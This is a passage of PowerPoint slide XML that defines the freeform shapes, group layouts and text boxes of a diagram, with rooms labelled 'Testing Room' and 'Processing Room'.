                  <a:gd name="T8" fmla="*/ 812 w 1039"/>
                  <a:gd name="T9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9" h="279">
                    <a:moveTo>
                      <a:pt x="812" y="279"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1039" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="812" y="279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26" name="Freeform 372">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9263FA-5F96-447E-BED6-E8E653399469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673" y="829"/>
                <a:ext cx="1784" cy="2414"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 755"/>
                  <a:gd name="T1" fmla="*/ 47 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 755"/>
                  <a:gd name="T3" fmla="*/ 47 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 755"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 755"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 755"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 501 w 755"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 501 w 755"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 755"/>
                  <a:gd name="T15" fmla="*/ 571 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 755"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 755"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 755"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 755"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 755"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 755"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 755"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 755"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 718 w 755"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 718 w 755"/>
                  <a:gd name="T35" fmla="*/ 218 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 755"/>
                  <a:gd name="T37" fmla="*/ 47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55" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="572" y="58"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                      <a:pt x="501" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                      <a:pt x="178" y="571"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="113" y="658"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                      <a:pt x="718" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                      <a:pt x="718" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="747" y="146"/>
                      <a:pt x="755" y="84"/>
                      <a:pt x="743" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="545554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27" name="Freeform 373">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1334C96A-9F9F-4219-8F55-B08B19992ECF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762" y="3000"/>
                <a:ext cx="1344" cy="364"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 439 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 364"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 123 h 364"/>
                  <a:gd name="T4" fmla="*/ 895 w 1344"/>
                  <a:gd name="T5" fmla="*/ 364 h 364"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 243 h 364"/>
                  <a:gd name="T8" fmla="*/ 439 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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364">
                    <a:moveTo>
                      <a:pt x="439" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="0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28" name="Freeform 374">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C991C8A6-D98B-4E27-B5FE-D9C82FBB91B5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763" y="855"/>
                <a:ext cx="1796" cy="2388"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 720 w 760"/>
                  <a:gd name="T1" fmla="*/ 15 h 1011"/>
                  <a:gd name="T2" fmla="*/ 705 w 760"/>
                  <a:gd name="T3" fmla="*/ 9 h 1011"/>
                  <a:gd name="T4" fmla="*/ 503 w 760"/>
                  <a:gd name="T5" fmla="*/ 149 h 1011"/>
                  <a:gd name="T6" fmla="*/ 503 w 760"/>
                  <a:gd name="T7" fmla="*/ 149 h 1011"/>
                  <a:gd name="T8" fmla="*/ 179 w 760"/>
                  <a:gd name="T9" fmla="*/ 570 h 1011"/>
                  <a:gd name="T10" fmla="*/ 169 w 760"/>
                  <a:gd name="T11" fmla="*/ 585 h 1011"/>
                  <a:gd name="T12" fmla="*/ 91 w 760"/>
                  <a:gd name="T13" fmla="*/ 699 h 1011"/>
                  <a:gd name="T14" fmla="*/ 68 w 760"/>
                  <a:gd name="T15" fmla="*/ 986 h 1011"/>
                  <a:gd name="T16" fmla="*/ 145 w 760"/>
                  <a:gd name="T17" fmla="*/ 966 h 1011"/>
                  <a:gd name="T18" fmla="*/ 145 w 760"/>
                  <a:gd name="T19" fmla="*/ 1011 h 1011"/>
                  <a:gd name="T20" fmla="*/ 720 w 760"/>
                  <a:gd name="T21" fmla="*/ 262 h 1011"/>
                  <a:gd name="T22" fmla="*/ 720 w 760"/>
                  <a:gd name="T23" fmla="*/ 217 h 1011"/>
                  <a:gd name="T24" fmla="*/ 720 w 760"/>
                  <a:gd name="T25" fmla="*/ 15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60" h="1011">
                    <a:moveTo>
                      <a:pt x="720" y="15"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="715" y="12"/>
                      <a:pt x="711" y="10"/>
                      <a:pt x="705" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="654" y="0"/>
                      <a:pt x="574" y="58"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                      <a:pt x="503" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                      <a:pt x="179" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="575"/>
                      <a:pt x="172" y="580"/>
                      <a:pt x="169" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="618"/>
                      <a:pt x="115" y="657"/>
                      <a:pt x="91" y="699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="845"/>
                      <a:pt x="0" y="973"/>
                      <a:pt x="68" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="991"/>
                      <a:pt x="116" y="983"/>
                      <a:pt x="145" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                      <a:pt x="145" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                      <a:pt x="720" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                      <a:pt x="720" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="759" y="118"/>
                      <a:pt x="760" y="38"/>
                      <a:pt x="720" y="15"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="A0A0A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701" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1E005C-1372-4835-8202-A56197DD59C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6104461" y="2973778"/>
              <a:ext cx="1547468" cy="416626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CACACA"/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702" name="Freeform 1063">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A352BA6-035A-487F-97F6-9CAF8AC850F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="7130552" y="1763181"/>
              <a:ext cx="1547468" cy="416627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CACACA"/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703" name="Text Box 1135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C5BCDBE-DBAB-4636-A14E-790A436D3502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7650234" y="2245046"/>
              <a:ext cx="104381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Testing Room</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1704" name="Group 439">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DFBD528-3EE5-4549-86CC-FBB4033F1C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5163" y="3167806"/>
              <a:ext cx="684457" cy="203551"/>
              <a:chOff x="1956" y="1206"/>
              <a:chExt cx="575" cy="171"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2209" name="Freeform 440">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3C3A52-A695-47E9-B8AC-2389BB01EF2E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1956" y="1206"/>
                <a:ext cx="573" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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10" name="Freeform 441">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA98F4F1-2E75-48FD-BEEB-3898BFD279A9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1958" y="1268"/>
                <a:ext cx="358" cy="109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603"/>
                    </a:ln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969696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11" name="Freeform 442">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0398B9E6-2099-40D3-87A9-ADF1ABF266F1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2316" y="1307"/>
                <a:ext cx="215" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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705" name="Group 1059">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9F993CC-996B-4AAF-9F81-460598410D0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950808" y="2047677"/>
              <a:ext cx="684456" cy="203552"/>
              <a:chOff x="1956" y="1206"/>
              <a:chExt cx="575" cy="171"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2206" name="Freeform 1060">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3C3947-2699-4399-BD7A-EC07EB943142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1956" y="1206"/>
                <a:ext cx="573" cy="154"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 600 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 359 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 600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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="600"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="600"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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07" name="Freeform 1061">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F16B9031-025D-46C9-8477-E5F25533A0CB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1958" y="1268"/>
                <a:ext cx="358" cy="109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 603 h 679"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 679"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 76 h 679"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 679 h 679"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 603 h 6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39" h="679">
                    <a:moveTo>
                      <a:pt x="0" y="603"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="603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969696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08" name="Freeform 1062">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B088C57C-3472-45F7-AC0F-96339DD251B7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2316" y="1307"/>
                <a:ext cx="215" cy="70"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 438"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 362 h 438"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 438 h 438"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 76 h 438"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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969696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706" name="Text Box 778">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC692E9-D98F-454A-80DC-678D312779C6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5673508" y="1575075"/>
              <a:ext cx="1199367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 Processing</a:t>
              </a:r>
              <a:b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</a:br>
              <a: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Room</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="900" b="1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707" name="Freeform 430">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{767CF614-328F-40B6-B688-B891011CE659}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5875912" y="2086958"/>
              <a:ext cx="1547468" cy="416627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CACACA"/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708" name="Group 412">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0F0D55-EF3C-438F-8E44-6A60302637A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867580" y="2269083"/>
              <a:ext cx="542804" cy="533281"/>
              <a:chOff x="762" y="611"/>
              <a:chExt cx="2797" cy="2753"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2189" name="Freeform 413">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB82787E-09A8-4A3E-8D5D-C7E45FFAD009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861" y="611"/>
                <a:ext cx="1786" cy="2415"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 743 w 756"/>
                  <a:gd name="T1" fmla="*/ 46 h 1022"/>
                  <a:gd name="T2" fmla="*/ 743 w 756"/>
                  <a:gd name="T3" fmla="*/ 46 h 1022"/>
                  <a:gd name="T4" fmla="*/ 743 w 756"/>
                  <a:gd name="T5" fmla="*/ 20 h 1022"/>
                  <a:gd name="T6" fmla="*/ 710 w 756"/>
                  <a:gd name="T7" fmla="*/ 11 h 1022"/>
                  <a:gd name="T8" fmla="*/ 704 w 756"/>
                  <a:gd name="T9" fmla="*/ 10 h 1022"/>
                  <a:gd name="T10" fmla="*/ 502 w 756"/>
                  <a:gd name="T11" fmla="*/ 149 h 1022"/>
                  <a:gd name="T12" fmla="*/ 502 w 756"/>
                  <a:gd name="T13" fmla="*/ 149 h 1022"/>
                  <a:gd name="T14" fmla="*/ 178 w 756"/>
                  <a:gd name="T15" fmla="*/ 570 h 1022"/>
                  <a:gd name="T16" fmla="*/ 168 w 756"/>
                  <a:gd name="T17" fmla="*/ 585 h 1022"/>
                  <a:gd name="T18" fmla="*/ 90 w 756"/>
                  <a:gd name="T19" fmla="*/ 700 h 1022"/>
                  <a:gd name="T20" fmla="*/ 63 w 756"/>
                  <a:gd name="T21" fmla="*/ 986 h 1022"/>
                  <a:gd name="T22" fmla="*/ 63 w 756"/>
                  <a:gd name="T23" fmla="*/ 986 h 1022"/>
                  <a:gd name="T24" fmla="*/ 104 w 756"/>
                  <a:gd name="T25" fmla="*/ 997 h 1022"/>
                  <a:gd name="T26" fmla="*/ 144 w 756"/>
                  <a:gd name="T27" fmla="*/ 966 h 1022"/>
                  <a:gd name="T28" fmla="*/ 144 w 756"/>
                  <a:gd name="T29" fmla="*/ 1011 h 1022"/>
                  <a:gd name="T30" fmla="*/ 183 w 756"/>
                  <a:gd name="T31" fmla="*/ 1022 h 1022"/>
                  <a:gd name="T32" fmla="*/ 719 w 756"/>
                  <a:gd name="T33" fmla="*/ 262 h 1022"/>
                  <a:gd name="T34" fmla="*/ 719 w 756"/>
                  <a:gd name="T35" fmla="*/ 217 h 1022"/>
                  <a:gd name="T36" fmla="*/ 743 w 756"/>
                  <a:gd name="T37" fmla="*/ 46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56" h="1022">
                    <a:moveTo>
                      <a:pt x="743" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                      <a:pt x="743" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                      <a:pt x="743" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                      <a:pt x="710" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="11"/>
                      <a:pt x="706" y="10"/>
                      <a:pt x="704" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="653" y="0"/>
                      <a:pt x="573" y="58"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                      <a:pt x="502" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                      <a:pt x="178" y="570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="575"/>
                      <a:pt x="171" y="580"/>
                      <a:pt x="168" y="585"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="619"/>
                      <a:pt x="114" y="657"/>
                      <a:pt x="90" y="700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="842"/>
                      <a:pt x="0" y="969"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                      <a:pt x="63" y="986"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                      <a:pt x="104" y="997"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                      <a:pt x="144" y="966"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                      <a:pt x="144" y="1011"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                      <a:pt x="183" y="1022"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                      <a:pt x="719" y="262"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
